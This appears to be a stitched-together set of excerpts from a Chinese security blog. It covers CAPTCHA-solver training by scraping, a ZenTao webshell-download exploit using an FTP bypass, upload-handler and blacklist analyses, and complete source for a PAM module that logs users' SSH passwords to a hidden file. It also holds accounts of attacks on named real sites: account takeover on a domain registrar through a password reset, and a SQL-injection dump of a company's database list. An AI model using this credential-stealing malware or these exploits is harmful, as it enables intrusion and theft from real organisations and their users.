e4rl

所用项目及服务器 ThinkPHP：https://github.com/top-think/framework think-captcha：https://github.com/top-think/think-captcha captcha_trainer （训练）：https://github.com/kerlomz/captcha_trainer captcha_platform （部署）：https://github.com/kerlomz/captcha_platform MuggleOCR：https://pypi.org/project/muggle-ocr captcha_trainer 作者介绍：https://www.jianshu.com/p/80ef04b16efc 矩池云 GPU服务器：https://matpool.com/ captcha_trainer 使用过程 使用 ThinkPHP 调用 think-captcha 生成验证码 1 2 3 4 composer create-project topthink/think tp cd tp composer require topthink/think-captcha php think run 修改 think-captcha 源码，将验证码存储到 Session 在 vendor/topthink/think-captcha/src/Captcha.php:195 插入以下代码 1 Session::set('captcha', implode('', $code), ''); 在控制器内打印验证码 1 2 3 4 public function code() { $code = Session::get('captcha', ''); echo $code; } 使用 Python 抓取图片验证码样本，按照 captcha_trainer 默认规则重命名保存 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 import requests import threading import os import hashlib # def md5(s, salt=''): new_s = str(s) + salt m = hashlib.md5(new_s.encode()) return m.hexdigest() # def get_captcha(): session = requests.session() for i in range(0, 100000): try: content = session.get('http://x.com/captcha?'+str(i)) if content.status_code != 200: continue code = session.get('http://x.com/index/Home/code') if code.status_code != 200: continue filename = '{}_{}.png'.format(code.text, md5(content.content)) with open(os.path.join('captcha_images', filename), 'wb') as f: f.write(content.content) f.close() except Exception as e: print(str(e)) # for i in range(1, 20): t = threading.Thread(target=get_captcha, args=()) t.start() 租用矩池云 RTX 2080 Ti 的GPU服务器进行训练 ...

漏洞分析 module/client/control.php:86 参数直接传入 module，跟进 downloadZipPackage 函数，全局搜索发现有两个downloadZipPackage函数： module/client/ext/model/xuanxuan.php:10 对 link 参数进行过滤，如果正则匹配到 http[s]:// 则返回false，可以使用FTP协议绕过。 module/client/model.php:240 base64 解密 link 参数后将下载文件至 data/client/ 拼接 version 参数的目录，无任何过滤。 调用路径：control -> ext module -> module 漏洞利用 Exploit： http://127.0.0.1/zentao/client-download-1-(base64 encode webshell download link)-1.html http://127.0.0.1/zentao/data/client/1/(download link filename) 复现： 使用FTP协议下载文件，绕过module/client/ext/model/xuanxuan.php:10函数的HTTP协议过滤。

起因 https://www.t00ls.net/viewthread.php?tid=56414 漏洞分析 入口 Public/Inner/Js/uploader/server/php/index.php ： 1 2 3 4 5 <?php error_reporting(E_ALL | E_STRICT); require('UploadHandler.php'); $upload_handler = new UploadHandler(); 关键代码 Public/Inner/Js/uploader/server/php/UploadHandler.php ： 初始化操作： 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 <?php class UploadHandler { protected $options; protected $error_messages = array( //忽略 ); protected $image_objects = array(); function __construct($options = null, $initialize = true, $error_messages = null) { $this->options = array( 'script_url' => $this->get_full_url().'/', 'upload_dir' => dirname($this->get_server_var('SCRIPT_FILENAME')).'/files/', 'upload_url' => $this->get_full_url().'/files/', 'user_dirs' => false, 'mkdir_mode' => 0755, 'param_name' => 'files', 'delete_type' => 'DELETE', 'access_control_allow_origin' => '*', 'access_control_allow_credentials' => false, 'access_control_allow_methods' => array( 'OPTIONS', 'HEAD', 'GET', 'POST', 'PUT', 'PATCH', 'DELETE' ), 'access_control_allow_headers' => array( 'Content-Type', 'Content-Range', 'Content-Disposition' ), 'download_via_php' => false, 'readfile_chunk_size' => 10 * 1024 * 1024, // 10 MiB 'inline_file_types' => '/\.(gif|jpe?g|png)$/i', 'accept_file_types' => '/.+$/i', 'max_file_size' => null, 'min_file_size' => 1, 'max_number_of_files' => null, 'image_file_types' => '/\.(gif|jpe?g|png)$/i', 'correct_image_extensions' => false, 'max_width' => null, 'max_height' => null, 'min_width' => 1, 'min_height' => 1, 'discard_aborted_uploads' => true, 'image_library' => 1, 'convert_bin' => 'convert', 'identify_bin' => 'identify', 'image_versions' => array( '' => array( 'auto_orient' => true ), 'thumbnail' => array( 'max_width' => 80, 'max_height' => 80 ) ) ); if ($options) { $this->options = $options + $this->options; //初始化配置 } if ($error_messages) { $this->error_messages = $error_messages + $this->error_messages; // 初始化错误信息 } if ($initialize) { $this->initialize(); //初始化操作 } } protected function initialize() { // 根据HTTP请求方法调用函数 switch ($this->get_server_var('REQUEST_METHOD')) { case 'OPTIONS': case 'HEAD': $this->head(); break; case 'GET': $this->get(); break; case 'PATCH': case 'PUT': case 'POST': $this->post(); break; case 'DELETE': $this->delete(); break; default: $this->header('HTTP/1.1 405 Method Not Allowed'); } } 跟进 post 函数: ...

原版项目地址：https://github.com/mthbernardes/sshLooterC （推送至Telegram） 测试环境：Centos 7 保存到指定文件版本 looter.c： 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 #include <stdio.h> #include <stdlib.h> #include <curl/curl.h> #include <string.h> #include <security/pam_appl.h> #include <security/pam_modules.h> #include <unistd.h> size_t write_data(void *buffer, size_t size, size_t nmemb, void *userp) { return size * nmemb; } void saveMessage(char (*message)[]) { FILE *fp = NULL; fp = fopen("/tmp/.looter", "a+"); fputs(*message, fp); fclose(fp); } PAM_EXTERN int pam_sm_setcred( pam_handle_t *pamh, int flags, int argc, const char **argv ) { return PAM_SUCCESS; } PAM_EXTERN int pam_sm_acct_mgmt(pam_handle_t *pamh, int flags, int argc, const char **argv) { return PAM_SUCCESS; } PAM_EXTERN int pam_sm_authenticate( pam_handle_t *pamh, int flags,int argc, const char **argv ) { int retval; const char* username; const char* password; char message[1024]; retval = pam_get_user(pamh, &username, "Username: "); pam_get_item(pamh, PAM_AUTHTOK, (void *) &password); if (retval != PAM_SUCCESS) { return retval; } snprintf(message,2048,"Username %s\nPassword: %s\n",username,password); saveMessage(&message); return PAM_SUCCESS; } 1.安装依赖库 ...

####漏洞代码 /vfm-admin/chunk.php 第134行 关键代码： 1 2 3 4 5 6 7 8 $chunk->createFileFromChunks( $_GET['loc'], $temp_dir, $resumableFilename, $_POST['resumableChunkSize'], $_POST['resumableTotalSize'], $_GET['logloc'] ); 跟进createFileFromChunks函数 /vfm-admin/class.php 第4383行 关键代码： 1 2 3 4 5 6 7 8 9 public function createFileFromChunks($location, $temp_dir, $fileName, $chunkSize, $totalSize, $logloc) { global $chunk; $upload_dir = str_replace('\\', '', $location); $extension = File::getFileExtension($fileName); // count all the parts of this file $total_files = 0; $finalfile = FileManager::safeExtension($fileName, $extension); //忽略 跟进safeExtension函数 /vfm-admin/class.php 第1707行 完整代码： 1 2 3 4 5 6 7 8 9 10 11 12 public static function safeExtension($name, $extension) { $evil = array( 'php','php3','php4','php5','htm','html','phtm','phtml', 'shtm','shtml','asp','pl','py','jsp','sh','cgi','htaccess', 'htpasswd','386','bat','cmd','pl','ddl','bin' ); //黑名单 if (in_array($extension, $evil)) { $name = $name.'.txt'; //如果后缀名出现在黑名单中，在原文件名后加.txt后缀 } return $name; } http://blog.csdn.net/u011650048/article/details/51454014 ...

1.越权管理域名：http://domain.cernet.com/domainForm.do?domainId={域名ID} 2.过户： （以前测试可行，现在接口被关闭无法再进行测试） 3.越权修改用户资料：（更改电子邮箱后可找回密码） 3.1.目标用户： 3.2.用其他用户新建一个联系人： 3.3.编辑联系人并抓包 3.4.将username改为目标用户test111并提交 3.5.修改邮箱并找回密码，获取目标用户权限： 3.5.1.修改资料： 3.5.2.找回密码： 无用户使用的邮箱会提示 输入我们刚才修改的邮箱： 把密码修改为123456 4.Bingo!~

主站和旁站我TM没找到一个后台，google/字典全都用辣！ URL：h-t-t-p://twice.jype.com/notice.asp?idx=86 MSSQL2008/DBA 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 available databases [50]: [*] audition [*] audition_test [*] baekayeon [*] bernardpark [*] chinese.jype.com [*] chinese.jype.comTest [*] day6 [*] english.jype.com [*] english.jype.comTest [*] fans [*] fans_test [*] fifteenand [*] fifteenand_test [*] friends [*] friends_new [*] got7 [*] got7_test [*] gsoul [*] gsoul_test [*] hatfelt [*] jangwooyoung [*] japanese.jype.com [*] japanese.jype.comTest [*] jjproject [*] jypark [*] jypark_test [*] master [*] missa [*] missa_test [*] model [*] msdb [*] PPURIO_MMS [*] PPURIO_MMS2 [*] publishing [*] publishing_test [*] scheduler.jype.com [*] scheduler.jype.comTest [*] sunmi [*] sunmi_test [*] syent [*] tempdb [*] twice [*] twoam [*] twoam_test [*] twopm [*] twopm_test [*] wondergirls [*] www.jype.com [*] www.jype.comTest [*] www.jypkms.com